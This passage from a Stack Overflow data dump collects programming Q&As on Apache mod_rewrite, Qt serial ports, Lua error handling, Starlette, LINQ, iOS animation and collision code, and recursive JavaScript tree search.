<code>RewriteCond<\/code> like so:\n<code>RewriteCond autogenerated\/$1.png -f<\/code>\n<code>RewriteCond autogenerated\/%{REQUEST_URI}.png -f<\/code>\n<code>RewriteCond %{DOCUMENT_ROOT}\/autogenerated\/%{REQUEST_FILENAME}.png -f<\/code>\n<code>RewriteCond %{DOCUMENT_ROOT}\/autogenerated\/$1.png -f<\/code>\n<code>RewriteCond %{DOCUMENT_ROOT}\/pict\/autogenerated\/%{REQUEST_FILENAME}.png -f<\/code>\n<code>RewriteCond %{DOCUMENT_ROOT}\/pict\/autogenerated\/$1.png -f<\/code>\nand no matter what I do, first RewriteRule never triggers, and everything is sent to the <code>gen.php<\/code>\nam I missing anything here?\nComment: Both REQUEST_FILENAME and REQUEST_URI contain the path information. \/\/ Where is your htaccess file located, in the root or the pict folder?\nComment: oh. I thought that REQUEST_FILENAME contains only what's after last \"\/\"\n\nmy `htaccess` file is inside \"pict\" folder\nAnswer: You can use rules like this inside <code>pict\/.htaccess<\/code>:\n<code>RewriteEngine On\nRewriteBase \/pict\/\n\n# if image file exists inside pict\/autogenerated\/ \nRewriteCond %{DOCUMENT_ROOT}\/pict\/autogenerated\/$1.png -f\nRewriteRule ^(.+)$ autogenerated\/$1.png [L]\n\n# else rewrite to generate.php\nRewriteCond %{REQUEST_FILENAME} !-f\nRewriteCond %{REQUEST_FILENAME} !-d\nRewriteRule ^(.+)$ generate.php?id=$1 [QSA,L]\n<\/code>\nComment: you're a star! thanks a lot :)\nstill don't get why it didn't work for me and setting `RewriteBase` did make it work, tough... o_O\n","meta":{"source":"stackoverflow","title":"mod_rewrite if file in subdirectory does not exist","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is it a problem to turn off power to a running QSerialPort?\n\nQuestion: I'm developing an application with several serial ports. Each of these ports is handled by a different thread and has its own <code>QSerialPort<\/code> object. From a hardware point of view, they are connected hierarchicaly, meaning that there is one main device connected to the PC with a usb cable (1 COM port), to this main device there are several other devices connected, each of them having its own COM port. The main device can turn on\/off the power supply to these child ports.\nIn the application, the ports are handled asynchronously. Each device object is running in its own loop. If its port is opened, it reads the incoming data. If the port is closed, it tries to open it in every loop until it succeeds. Each <code>QSerialPort<\/code> object handles errors on the <code>errorOccurred<\/code> signal. If it receives <code>DeviceNotFoundError<\/code>, <code>PermissionError<\/code>, <code>ResourceError<\/code> error, the port is closed (if it was opened) and the looping continues as described above.\nThe problem is that this serial communication part of the application is crashing (segmentation fault). I spent days finding the issue but with no results so far. To better understand what is going on, I wanted to ask here. Could it be a problem for <code>QSerialPort<\/code> if the main device turns off the power supply for the child ports while they're opened and are working? Or if the power supply is turned off while the child ports are being opened\/closed or any other operation is being executed on them? (I don't want to include the specific executable code as it's a part of a bigger application and would be hard to make and executable from it. I'd like to discuss just the concepts described above if possible.)\nThanks for any help or ideas!\nUPDATE\nCreating of <code>QSerialPort<\/code> and putting it into a different thread:\n<code>QThread *t = new QThread(this)\nSomeObject *o = new SomeObject(this);\n\no->moveToThread(t);\nt->start();\n<\/code>\nLater in the <code>SomeObject<\/code>:\n<code>QSerialPort *port = new QSerialPort();\n<\/code>\nComment: Could you add your code where the segmentation fault occurs please?\nComment: @ElevenJune I don't know where it occurs. That's why I'm speaking just abstractly with no code example.\nComment: Could you show the part where you create the QSerialPort and put them into different threads ?\nComment: @ElevenJune Updated the question.\nComment: Are your SomeObject* and QSerialPort* in the same thread ?\nThis is my code : \n `m_serialPort = new QSerialPort();\n m_serialPortThread = new QThread();\n\n m_serialPort->moveToThread(m_serialPortThread);\n moveToThread(m_serialPortThread);\n m_serialPortThread->start();`\nMy SomeObject* creates the QThread and moves itself in it with its QSerialPort.\nComment: The whole routine is following: SomeObject has its own thread and QSerialPort pointer. Then there is AnotherObject from another thread, which accesses SomeObject's pointer, creates and opens the QSerialPort object. Then only AnotherObject works with the port, so the port is created and handled by the same thread. This implementation had its reasons and it's not standard. It works fine, but sometimes it accidentaly crashes in some part of serial communication.\nComment: @T.Poe, did you ever figure out a solution to this? I have the same problem, if the serial port I have open looses power or is disconnected, I get a segmentation fault, even if I try to close the port as soon as it's detected. I would appreciate it if you could share your solution (if you found one yet). Thanks!\nComment: @Brent I'm not sure if we solved the issue or it just stopped happening. Here is a thread I started on qt forum, maybe something of that helps you: https:\/\/forum.qt.io\/topic\/94878\/turning-off-power-to-a-running-qserialport\nAnswer: Try to destroy port object before power off, and recreate it after power on\n<code>QSerialPort *port = new QSerialPort();\n\/\/init and use\n\/\/....\ndelete port;\nport = nullptr;\n\/\/turn the power off\n\n\/\/turn the power on\nport = new QSerialPort();\n<\/code>\nComment: The problem is, that switching on and off the ports is asynchronous. I don't know when it happens, so I cannot destroy the object.\n","meta":{"source":"stackoverflow","title":"Is it a problem to turn off power to a running QSerialPort?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Lua: How to properly clean up errors returned by lua_pcall\n\nQuestion: I've been having a crash problem with Lua for a little while now, and I finally discovered what I believe to be the problem. I'm allowing the script to omit functions that are attempted to be called for convenience. I want my application to attempt to invoke TestFun (as an example), and if it exists then execute it, otherwise gracefully and silently fail.\nThe problem I was having was that I simply invoked lua_pcall(L, 0, 0, 0) and ignored the return value because it didn't matter to me. What I discovered was that when Lua generates the error \"attempt to call nil\" it places this on its stack and I was not popping this off. The code below exhibits a crash shortly after being run due to the stacksize growing too large:\n<code>int _tmain(int argc, _TCHAR* argv[])\n{\n std::string script = \"\";\n lua_State* L = luaL_newstate();\n luaL_openlibs(L);\n luaL_loadstring(L, script.c_str());\n lua_pcall(L, 0, LUA_MULTRET, 0);\n\n while (true)\n {\n lua_getglobal(L, \"TestFunc\");\n lua_pcall(L, 0, 0, 0);\n }\n\n return 0;\n}\n<\/code>\nI simply modified my code inside the while loop to be:\n<code>while (true)\n{\n lua_getglobal(L, \"TestFunc\");\n if (lua_pcall(L, 0, 0, 0))\n lua_pop(L, -1);\n}\n<\/code>\nAnd this solved my crash. My question is whether or not this is valid in all cases of lua_pcall() error results, or if I'm setting myself up for another bug\/crash by not specifically checking if I should pop -1 (or possibly others?). Perhaps I should only pop if -1 is a string, or perhaps there's a standard 'cleanup the stack' function I could call?\nThanks\nComment: It depends whether your error handler function adds any items to the stack. You could always (in the debug build) use `lua_gettop` before and after `lua_pcall` to check, if stack size is ok.\nAnswer: Your modified code is fine except that you need to pop 1, not -1.\n","meta":{"source":"stackoverflow","title":"Lua: How to properly clean up errors returned by lua_pcall","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to design navigation for a Starlette SPA\n\nQuestion: I want to create a light-weight-SPA.\nI thought of passing in a path param (<code>nav_element<\/code>), which also corresponds to the resource. The Jinja2 engine can then simply access the value by {{nav_element}}.\n<code>async def dashboard(request: Request):\n \"\"\"For this page you must be authenticated.\"\"\" \n await request.send_push_promise(\"\/static\/styles.css\")\n\n try:\n nav_element = request.path_params['nav_element']\n except KeyError as ex:\n nav_element = None\n logger.info(nav_element)\n\n return templates.TemplateResponse('dashboard.html', {'request': request, \"nav_element\": nav_element})\n\nroutes = [\n Route('\/', endpoint=dashboard, methods=[\"GET\"]),\n Route('\/{nav_element:str}', endpoint=dashboard, methods=[\"GET\"]),\n Mount(path=\"\/static\", app=StaticFiles(directory=\"static\"), name=\"static\")\n]\n\nwebapp = Starlette(routes=routes )\n<\/code>\n(there is one thing I don't like with this approach, it requires 2 routes. anyhow.)\nSo, but how do I load the page elements?\n\nJavaScript I could do. But what is the best practice with Jinja2\/Starlette to load only specific elements of the page after clicking them in the navigation?\nAre there Jinja2\/Starlette elements that could help me rendering\/loading page elements\/fractions\/webcomponets for the SPA? I know {% include a_page.html %}. But that would not be how we load a SPA, right?!\nI really want to avoid to load entire pages.\n\nAny design experience is highly welcome.\nComment: I think StreamingResponse is what you need, I'll give a try and add an answer.\nAnswer: I did not have a sample to try, but can you try this?\n<code>async def dashboard(request: Request):\n \"\"\"For this page you must be authenticated.\"\"\"\n async def streamer():\n try:\n nav_element = request.path_params['nav_element']\n\n except KeyError as ex:\n nav_element = None\n yield templates.TemplateResponse('dashboard.html', {'request': request, \"nav_element\": nav_element}).body\n\n return StreamingResponse(streamer(), media_type=\"text\/html\")\n<\/code>\nComment: That is an interesting idea with the open stream. I'll test it ...\nAnswer: I must say any other solution than loading widgets for an Starlette-SPA by Javascript becomes utterly complex. There is one reason, when you load a HTML-template and you use the jinja2 include statements, it will NOT invoke the endpoint that is associated with it in Starlette. Thus, the data, which needs to be fetch for displaying in the widget (processed in the HTTPEndpoint), is never invoked. Makes sense in a way.\nSo the only way I found is to send another http request after the page has been loaded. I think that is the cleanest\/shortest way to go for widgets (which have no SEO-requirements) not trying to work against Starlette's concept.\n<code>main = document.querySelector(\"#main_content > .title\");\nfetch(\"\/dashboard\/widgets\/test\")\n .then(response => response.text())\n .then(data => main.insertAdjacentHTML(\"afterend\", data));\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to design navigation for a Starlette SPA","dup_signals":{}},"subset":"stackexchange"} +{"text":"Distinct LINQ Statement - Select Group where Entity doesn't exist\n\nQuestion: I currently have a LINQ statement that returns an IQueryable to be displayed into a Telerik RadGrid. This statement is set to pull Records that match the Period inputted, and also have the \"Premium\" Column set to true. It then selects the EmployeeID & ProjectID distinctly using the GroupBy property.\nThese columns are then displayed in the RadGrid, along with a \"PremiumCode\" column. \nCurrently my statement works to display ALL of the records that meet the top credentials (Employee Name, Project, Premium Code), but my end Goal is to pull only those Records which DONT already have a \"PremiumCode\" assigned to the Project for that particular Employee.\n<code>public static IQueryable GetEmptyPremiums(string Period)\n {\n DataContext Data = new DataContext();\n var PR = (from c in Data.System_Times\n where c.Period == Period && c.Premium == true\n orderby c.System_Employee.LName\n select c).GroupBy(s => s.EmployeeID & s.ProjectID).Select(x => x.FirstOrDefault());\n\n return PR;\n }\n<\/code>\nCurrently it is displaying properly, but every record is being displayed, not just the ones that require a PremiumCode.\n\nIs there a way to re-work my LINQ statement to only include the records that need a PremiumCode?\nEDIT:\nJay,\nI have tried to modify your solution to fit my needs, but unfortunately with no success. Records in the Premium table are not added until a Premium Code is defined, therefore there will never be a null \"PremiumCode\". \nTo describe my end-goal a tad more clearly: I am looking to show the information in a grid like in the image above. The records shown will be the distinct Time records that have the bool value \"Premium\" checked as true but don't have a PremiumCode record in the Premium Table. \nIf the checked record has a matching record in the Premium table (EmployeeID, and ProjectID matching) then it already possesses a Premium Code set and will not need to be displayed in the Grid. \nIf the checked record has no matching record in the Premium table (EmployeeID, and ProjectID not matching) then it requires a PremiumCode and will need to be displayed in the Grid.\nI believe this can be achieved with \".Any()\" but I am having troubles aligning my Syntax and Logic to make this Grid display properly.\nComment: You haven't mentioned how the premium code is represented within the database or your model.\nComment: where c.Period == Period && c.Premium == true && !c.PremiumCode.HasValue -- is something like that what you are seeking?\nComment: The PremiumCode is located in it's own Table consisting of EmployeeID, ProjectID, PremiumCode, and a PremiumID. These are linked to an Employees Table, and Projects Table, respectively. Andrew - that is along the lines of what I am looking for but I with no Relationships between my Times and Premium Table, I cannot simply use c.PremiumCode, and c.System_Premium.PremiumCode gives me errors with IntelliSense.\nComment: Lando, I added an update in response to the edit.\nAnswer: How about:\n<code> DataContext Data = new DataContext();\n var projectsWithoutPremium = Data.Premiums.Where(p => p.PremiumCode == null)\n .Select(p => p.ProjectId);\n var PR = (from c in Data.System_Times\n where c.Period == Period && c.Premium == true\n && projectsWithoutPremium.Contains(c.ProjectId)\n orderby c.System_Employee.LName\n select c).GroupBy(s => s.EmployeeID & s.ProjectID).Select(x => x.FirstOrDefault());\n\n return PR;\n<\/code>\nupdate in response to question edit\n<code>DataContext Data = new DataContext();\nvar PR = (from c in Data.System_Times\n where c.Period == Period && c.Premium == true\n && !Data.Premiums.Any(p => p.ProjectID == c.ProjectID && p.EmployeeID == c.ProjectID) \n orderby c.System_Employee.LName select c)\n .GroupBy(s => s.EmployeeID & s.ProjectID)\n .Select(x => x.FirstOrDefault());\n\nreturn PR;\n<\/code>\nComment: This worked perfect! Hadn't thought of nesting a second LINQ statement, Thanks again!\nAnswer: If premium code is a string, you might want to try adding something like <code>.Where(x => string.isNullOrEmpty(x.PremiumCode))<\/code> before the GroupBy clause.\nComment: Logically this would work (and wish it did), but since there is no link directly from my \"Times\" table to my \"Premium\" table, I cannot simply use x.PremiumCode, or x.System_Premium.PremiumCode. I have my DB setup this way so that Each Employee, can have a different PremiumCode for each Job, not each record in the Times table.\n","meta":{"source":"stackoverflow","title":"Distinct LINQ Statement - Select Group where Entity doesn't exist","dup_signals":{}},"subset":"stackexchange"} +{"text":"Error colliding Images method in Xcode\/iOS\n\nQuestion: I am creating an iOS app with Xcode 6.1 using Objective C\nI am trying to create code to stop a moving object (Character) when hits another object. I have tried to do this using two methods but the object seem to be stopping at a different point to what I have set it to. Below are the two methods I have tried. I have also put links to the full version of the code on dropbox (links below).\nMethod 1: When the object reaches a particular co-ordinate.\n<code>\/\/Right Wall\nif(Character.center.x>295){\n [CharacterMovingTimer invalidate];\n}\n\/\/Left Wall\nif(Character.center.x<30){\n [CharacterMovingTimer invalidate];\n}\n\/\/Top Wall\nif(Character.center.y<30){\n [CharacterMovingTimer invalidate];\n}\n\/\/Bottom Wall\nif(Character.center.y>587){\n [CharacterMovingTimer invalidate];\n}\n<\/code>\nMethod 2: When the object intersect with the second object\n<code>if(CGRectIntersectsRect(Character.frame, RightWall.frame)){\n [CharacterMovingTimer invalidate];\n }\n if(CGRectIntersectsRect(Character.frame, LeftWall.frame)){\n [CharacterMovingTimer invalidate];\n }\n if(CGRectIntersectsRect(Character.frame, TopWall.frame)){\n [CharacterMovingTimer invalidate];\n }\n if(CGRectIntersectsRect(Character.frame, BottomWall.frame)){\n [CharacterMovingTimer invalidate];\n }\n<\/code>\nViewController.h\nhttps:\/\/www.dropbox.com\/s\/56j7rokp4il5eul\/ViewController_h.rtf?dl=0\nViewController.m\nhttps:\/\/www.dropbox.com\/s\/faqqbsnqb8o4se7\/ViewController_m.rtf?dl=0\nComment: What speed is the character moving? If you want the character to stop at 295 you would need to set their position after stopping the timer. If the character is moving at 40 pixels per timer tick the stop position could range between 295 and 335.\nComment: The character is moving at 30 pixels every 0.3 seconds.\nComment: And how far is the character off from where you expect him to be when you have a collision?\nComment: Sorry the issue is that when the character gets close to the wall it stops at a point that is not that actual co-ordinate i have set it to.. please take a look at this image, you can see the point at which the character stops is after it has gone through the object.\n\nhttps:\/\/www.dropbox.com\/s\/0vcebj725y6qpw5\/Main_storyboard2.png?dl=0\n\nit was set to stop once they touch, when i try to change the co-ordinates slightly it never allows the character to stop at that exact point.\nComment: Ok, so back to my original comment, I will now use that as an answer.\nAnswer: If you want the character to stop at 295 you would need to set their position after stopping the timer. If the character is moving at 40 pixels per timer tick the stop position could range between 295 and 335.\nUsing your first code as an example:\n<code>if(Character.center.x>295){\n Character.center = CGPointMake(295, Character.center.y);\n [CharacterMovingTimer invalidate];\n}\n\/\/Left Wall\nif(Character.center.x<30){\n Character.center = CGPointMake(30, Character.center.y);\n [CharacterMovingTimer invalidate];\n}\n\/\/Top Wall\nif(Character.center.y<30){\n Character.center = CGPointMake(Character.center.x, 30);\n [CharacterMovingTimer invalidate];\n}\n\/\/Bottom Wall\nif(Character.center.y>587){\n Character.center = CGPointMake(Character.center.x, 587);\n [CharacterMovingTimer invalidate];\n}\n<\/code>\nComment: Thank you for you answer, but this is still not working the same issue is occurring, the collision is identified either before or after the objects actually collide. Could it be something related to my settings rather than my code?\nComment: Could you post a new screen shot of what's happening now please?\nComment: And, given the iPhone 6 screen width of 375, what makes you think that the square is not at 295?\nComment: When I increase the co-ordinate number to 300, it stops at the same point. Even when the number is 305, it still stops at the exact same point.\nComment: Log out the x when it stops. I am guessing your statement will be incorrect and that you are just not noticing the 5 or 10 pixel change.\nComment: Slight movement with objects usually noticeable. But in this case I can see the object is in the same place until I increase the figure by 50 pixels, then it makes a dramatic jump. So there is no in between.\nComment: I would imagine that the number is 30 pixels as that's what you're moving by. You do change BOTH the check AND the assignment yes? I would instead move by 10 pixels every 0.1 if you're going to do it that way, it allows better control\nComment: I have tried that but no change. I have uploaded the code to dropbox, give it a go if you have a chance you'll understand.\nComment: Is there a link the to the project? The old links just link to old code with none of the changes mentioned here.\nComment: I have not saved any of these changes as they have not made a difference to the problem. I would like others to be able to alter the initial code to find a solution.\nComment: How about building the screen, the map, the walls. I'm prepared to look at your issue, not rebuild the project off of 1 view controller\nComment: I didn't realise the project link was not available \nhttps:\/\/www.dropbox.com\/s\/w5fmht5dinz5wfj\/ObjectMovement.zip?dl=0\nComment: I have downloaded and looked and everything is working as it should be. I changed the value from 295 to 300 and the block stopped 5 pixels further than it did previously. Be sure to change both values: `if(Character.center.x>305){\n Character.center = CGPointMake(305, Character.center.y);` Log out the positions and you will see\n","meta":{"source":"stackoverflow","title":"Error colliding Images method in Xcode\/iOS","dup_signals":{}},"subset":"stackexchange"} +{"text":"Search nested object and return whole path\n\nQuestion: I have below JavaScript with n level children and want to search for id and if any of item from has matching id than need to return object from root to matching item.\nI want to return entire hierarchy of found item from root till object with it's children.\nI tried with lodash and underscore and could not find easy solution.\n<code>input: {\n \"children\": [{\n \"name\": \"Home\",\n \"title\": \"Home\",\n \"id\": \"home1\",\n \"children\": []\n },\n {\n \"name\": \"BUSINESS AND ROLE SPECIFIC\",\n \"title\": \"BUSINESS AND ROLE SPECIFIC\",\n \"id\": \"BAR1\",\n \"children\": [{\n \"name\": \"Global Businesses\",\n \"title\": \"Global Businesses\",\n \"id\": \"GB1\",\n \"children\": [{\n \"name\": \"Commercial Banking\",\n \"title\": \"Commercial Banking\",\n \"id\": \"CB1\",\n \"children\": [{\n \"name\": \"FLAGSHIP PROGRAMMES\",\n \"title\": \"FLAGSHIP PROGRAMMES\",\n \"id\": \"FG1\",\n \"children\": []\n }]\n }]\n }]\n },\n {\n \"name\": \"RISK MANAGEMENT\",\n \"title\": \"RISK MANAGEMENT\",\n \"id\": \"RM1\",\n \"children\": []\n }\n ]\n}\n\nSearch: {\n id: 'FG1'\n}\n\nreturn :{\n \"name\": \"BUSINESS AND ROLE SPECIFIC\",\n \"title\": \"BUSINESS AND ROLE SPECIFIC\",\n \"id\": \"BAR1\",\n \"children\": [{\n \"name\": \"Global Businesses\",\n \"title\": \"Global Businesses\",\n \"id\": \"GB1\",\n \"children\": [{\n \"name\": \"Commercial Banking\",\n \"title\": \"Commercial Banking\",\n \"id\": \"CB1\",\n \"children\": [{\n \"name\": \"FLAGSHIP PROGRAMMES\",\n \"title\": \"FLAGSHIP PROGRAMMES\",\n \"id\": \"FG1\",\n \"children\": [{}]\n }]\n }]\n }]\n}\n<\/code>\nComment: This seems like a homework task, it's obvious you should write a recursive method to walk down the tree.\nComment: Please show what you tried\nComment: Please share a [Minimal, Complete, and Verifiable example](https:\/\/stackoverflow.com\/help\/mcve) of your first approach (code)\nAnswer: You could use this function:\n\n<code>function findChild(obj, condition) {\n if (Object.entries(condition).every( ([k,v]) => obj[k] === v )) {\n return obj;\n }\n for (const child of obj.children || []) {\n const found = findChild(child, condition);\n \/\/ If found, then add this node to the ancestors of the result\n if (found) return Object.assign({}, obj, { children: [found] });\n }\n}\n\/\/ Sample data\nvar input = { \"children\": [{ \"name\": \"Home\", \"title\": \"Home\", \"id\": \"home1\", \"children\": [] }, { \"name\": \"BUSINESS AND ROLE SPECIFIC\", \"title\": \"BUSINESS AND ROLE SPECIFIC\", \"id\": \"BAR1\", \"children\": [{ \"name\": \"Global Businesses\", \"title\": \"Global Businesses\", \"id\": \"GB1\", \"children\": [{ \"name\": \"Commercial Banking\", \"title\": \"Commercial Banking\", \"id\": \"CB1\", \"children\": [{ \"name\": \"FLAGSHIP PROGRAMMES\", \"title\": \"FLAGSHIP PROGRAMMES\", \"id\": \"FG1\", \"children\": [] }] }] }] }, { \"name\": \"RISK MANAGEMENT\", \"title\": \"RISK MANAGEMENT\", \"id\": \"RM1\", \"children\": [] } ]},\n search = { id: 'FG1' };\n\nconsole.log(findChild(input, search));<\/code>\n<code>.as-console-wrapper { max-height: 100% !important; top: 0; }<\/code>\n\nYou can use this also for searching with multiple conditions, which must be true at the same time:\n<code>search = { \"name\": \"Global Businesses\", \"title\": \"Global Businesses\" };\n<\/code>\n... would give you the object that has the specified name and title.\nFollow-up question\nYou asked in comments:\n\nIs there way to supply number to not remove children for given node in input. like,\n<code>const donotRemoveChildNode = 2; \nconsole.log(findChild(input, search, donotRemoveChildNode )); \n<\/code>\n...so it will not remove that specific node's children if it matches condition?\nHere, if we search for <code>{ id: 'FG1'}<\/code> and supply <code>donotRemoveChildNode = 2<\/code>, it would not remove the first level children for \"Commercial banking\".\n\nI would say the <code>donotRemoveChildNode<\/code> would have to be 3, as there are three levels of <code>children<\/code> arrays in the ancestor-hierarchy of the \"Commercial banking\" node. A value of 0 would show the first level children of the top-most <code>children<\/code> property.\nHere is how that extra argument would work -- I added some records to the data to illustrate the difference in the output:\n\n<code>function findChild(obj, condition, removeChildNodesBefore = Infinity) {\n if (Object.entries(condition).every( ([k,v]) => obj[k] === v )) {\n return obj;\n }\n for (const child of obj.children || []) {\n let found = findChild(child, condition, removeChildNodesBefore - 1);\n if (found) {\n return Object.assign({}, obj, { \n children: removeChildNodesBefore <= 0 \n ? obj.children.map( sibling => \n sibling == child ? found \n : Object.assign({}, sibling, {children: []}) \n )\n : [found]\n });\n }\n }\n}\n\nvar input = { \"children\": [{ \"name\": \"Home\", \"title\": \"Home\", \"id\": \"home1\", \"children\": [] }, { \"name\": \"BUSINESS AND ROLE SPECIFIC\", \"title\": \"BUSINESS AND ROLE SPECIFIC\", \"id\": \"BAR1\", \"children\": [{ \"name\": \"Global Businesses\", \"title\": \"Global Businesses\", \"id\": \"GB1\", \"children\": [{ \"name\": \"test\", \"title\": \"test\", \"id\": \"xxx\", \"children\": [{ \"name\": \"testDeep\", \"title\": \"test\", \"id\": \"deep\", \"children\": []}]}, { \"name\": \"Commercial Banking\", \"title\": \"Commercial Banking\", \"id\": \"CB1\", \"children\": [{ \"name\": \"test\", \"title\": \"test\", \"id\": \"yyy\", \"children\": []}, { \"name\": \"FLAGSHIP PROGRAMMES\", \"title\": \"FLAGSHIP PROGRAMMES\", \"id\": \"FG1\", \"children\": [] }] }] }] }, { \"name\": \"RISK MANAGEMENT\", \"title\": \"RISK MANAGEMENT\", \"id\": \"RM1\", \"children\": [] } ]},\n search = { id: 'FG1' }\n\nconsole.log(findChild(input, search, 3));<\/code>\n<code>.as-console-wrapper { max-height: 100% !important; top: 0; }<\/code>\nComment: thanks for reply, I need to have returned value from root till found object in hierarchy not just matching object.\nComment: So you want a tree that has siblings *removed* from the ancestors's children? I have updated my answer to do just that. Can you check?\nComment: thanks, exactly I was looking for, also I am not good with javascript but is there way to supply number to not remove children for given node in input. like, const donotRemoveChildNode = 2; console.log(findChild(input, search, donotRemoveChildNode )); so it will not remove that specific node's children if it matches condition?, here if search for id : 'FG1' and supply donotRemoveChildNode = 2 so it will not remove first level children for Commercial banking?\nComment: Do you mean *only* first level children, meaning that those children should have their own `children` property always equal to `[]`, even if they have children in the original input?\nComment: Anyway, I interpreted it like that, and added a section to my answer. Do you like it?\nComment: thanks for it, I did not get chance to look at it yesterday. i have updated js fiddle, I think it is still returning not correct result or may be I was not correct in writing. jsfiddle: https:\/\/jsfiddle.net\/L0nwunqd\/2\/, on jsfiddle I am searching for `{\n guid: '677b7bc1-f429-4f2b-9347-463ac1aa89f7'\n}` so it should return below result till hierarchy with children of matching guid and it should also return children of nth element if nth element is part of hierarchy. I have added expected return in jsfiddle, any help would be much appreciated.\nAnswer: <code>function getBranch(branches, leaf_id)\n{ \n var result_branch = null;\n\n branches.some(function(branch, idx) {\n if (branch.id == leaf_id) {\n result_branch = Object.assign({}, branch);\n result_branch.children.forEach(function(child, idx) {\n delete result_branch.children[idx].children;\n });\n\n return true;\n } else {\n let target_branch = getBranch(branch.children, leaf_id);\n\n if (target_branch) {\n result_branch = Object.assign({}, branch);\n delete result_branch.children\n result_branch.children = [target_branch];\n\n return true; \n }\n }\n\n return false;\n });\n\n return result_branch;\n}\n\nconsole.log(getBranch(input.children, 'GB1'));\n<\/code>\nComment: thanks @y-bond for function, i tried above function but even if I search for \"GB1\" it return everything from root till all child, I need to get from root till \"GB1\" with first level children in return.\nComment: ok, I've updated the function. If I get you right, it can work the way you want\nAnswer: One way is to first loop the root children, and then create another function to see if the Id exists in any of it's children.\n\n<code>var data = {\n \"children\": [{\n \"name\": \"Home\",\n \"title\": \"Home\",\n \"id\": \"home1\",\n \"children\": []\n },\n {\n \"name\": \"BUSINESS AND ROLE SPECIFIC\",\n \"title\": \"BUSINESS AND ROLE SPECIFIC\",\n \"id\": \"BAR1\",\n \"children\": [{\n \"name\": \"Global Businesses\",\n \"title\": \"Global Businesses\",\n \"id\": \"GB1\",\n \"children\": [{\n \"name\": \"Commercial Banking\",\n \"title\": \"Commercial Banking\",\n \"id\": \"CB1\",\n \"children\": [{\n \"name\": \"FLAGSHIP PROGRAMMES\",\n \"title\": \"FLAGSHIP PROGRAMMES\",\n \"id\": \"FG1\",\n \"children\": []\n }]\n }]\n }]\n },\n {\n \"name\": \"RISK MANAGEMENT\",\n \"title\": \"RISK MANAGEMENT\",\n \"id\": \"RM1\",\n \"children\": []\n }\n ]\n};\n\nfunction hasId( id, data ) {\n if (data.id === id) return true;\n if (data.children) {\n for (const child of data.children) {\n if (hasId( id, child)) return true;\n }\n }\n return false;\n}\n\nfunction search( id, data ) {\n for (const child of data.children) {\n if (hasId(id, child)) return child;\n }\n return null;\n}\n\nconsole.log(search( \"FG1\", data ));<\/code>\nComment: thanks for reply, it return all children from root I only want to select children who is part of hierarchy, so let say if I search for \"FG1\" then any of it parents's not all children should return except which are in path to reach \"FG1\"\nComment: @oypatel `it return all children from root ` Not it doesn't.. Did you run the snippet above?\nComment: yes I did and it return all children from parent, I have created jsfiddle for same. can you plesae have quick look? https:\/\/jsfiddle.net\/uz0a3LpL\/1\/\nComment: My snippet returns what your question say's it should, & your fiddle's source object is in a different format to your question. IOW: Your question shows an object with a property called children, your fiddle is an array at it's root.. What is it?..\nComment: IOW: Press the button above that say's `Run code snippet`, examine the output. You basically have 3 root nodes.. `home1`, `BAR1` & `RM1`, obviously `BAR1` is what we want, but can you see any reference to `home1` & `RM1` in the above output after running snippet.\nComment: Thanks for reply @Keith, I have updated jsfiddle now with same format as question. I want to have entire object hierarchy from root till object found. sorry for confusion\nComment: Your fiddle returns `LEADERSHIP` as the root, is this what you want?, but you have done -> `$(\"div#result\").html(search( \"1c80b174-54b0-469c-8522-64a606308561\", data ));` an object is not HTML,.. You could `JSON.stringify` Here is your fiddle updated doing that -> https:\/\/jsfiddle.net\/uz0a3LpL\/2\/\n","meta":{"source":"stackoverflow","title":"Search nested object and return whole path","dup_signals":{}},"subset":"stackexchange"} +{"text":"getting access EXC_BAD_ACCESS when doing animation\n\nQuestion: I am doing an animation, so when you click a button MyAccount from the first screen it will navigate you to Account View\n<code>- (void)pushToAccount\n{\n AccountViewController *controller = [[AccountViewController alloc] initWithNibName:@\"AccountViewController\" bundle:nil];\n \/\/[self.navigationController pushViewController:controller animated:NO];\n\n [UIView beginAnimations: @\"Showinfo\"context: nil];\n [UIView setAnimationCurve: UIViewAnimationCurveEaseInOut];\n [UIView setAnimationDuration:0.75];\n [self.view addSubview:controller.view];\n [UIView setAnimationTransition:UIViewAnimationTransitionFlipFromRight forView:self.view cache:NO];\n [UIView commitAnimations];\n\n}\n<\/code>\nHowever, whenever i click on the Account View Controller ( contains some buttons and images view in it ), my program is crashing at it show EXC_BAD_ACCESS at main class\nPlease advice me on this issue...\nComment: check your controller's viewDidLoad is called?\nComment: yes, just put a break point and it is called\nComment: start debugging from there by adding breakpoint to all methods and find out where it gets bad excess.\nAnswer: Your view controller is trying to animate a transition by adding another view controller's view as a subview of your current view. That's problematic on a whole bunch of dimensions. Notably, you're not doing anything with the new view controller itself ... if this was an ARC project, it will get released on you.\nIf you just want to transition from one view controller to another, you should generally either do a standard <code>pushViewController:animated:<\/code> or <code>presentModalViewController:animated:<\/code>. It looks like you used to do the former. Why did you replace it with the current code?\nIf you can tell us what you were trying to do, why you're not using the standard transitions, perhaps we can help you further.\nUpdate:\nIf you don't like the default animation, but rather want some custom animation to your transition, you can do something like:\n<code>CustomAnimationViewController *yourNewViewController = [[CustomAnimationViewController alloc] initWithNibName:@\"CustomAnimationView\" bundle:nil];\n\n[UIView beginAnimations:nil context:nil];\n[UIView setAnimationCurve: UIViewAnimationCurveEaseInOut];\n[UIView setAnimationDuration:0.75];\n[self.navigationController pushViewController:yourNewViewController animated:NO];\n[UIView setAnimationTransition:UIViewAnimationTransitionFlipFromRight forView:self.navigationController.view cache:NO];\n[UIView commitAnimations];\n\n\/\/ if you're using ARC, you don't need this following release, but if you're not using ARC, remember to release it\n\n\/\/ [yourNewViewController release];\n<\/code>\nUpdate 2:\nAnd, anticipating the logical follow-up question, how do you animate the dismissal of the new view controller, you might, for example have a \"done\" button that invokes a method like the following:\n<code>- (IBAction)doneButton:(id)sender \n{\n [UIView beginAnimations:nil context:nil];\n [UIView setAnimationCurve: UIViewAnimationCurveEaseInOut];\n [UIView setAnimationDuration:0.75];\n [UIView setAnimationTransition:UIViewAnimationTransitionFlipFromLeft forView:self.navigationController.view cache:NO];\n [UIView commitAnimations];\n\n [UIView beginAnimations:nil context:NULL];\n [UIView setAnimationDelay:0.375];\n [self.navigationController popViewControllerAnimated:NO];\n [UIView commitAnimations];\n}\n<\/code>\nComment: @ttran Anticipating that you'd next ask how to animate the dismissal of the new view controller, I've updated my answer accordingly.\nComment: what I am trying to do is to animate the transition. Firstly,I followed the tutorial at 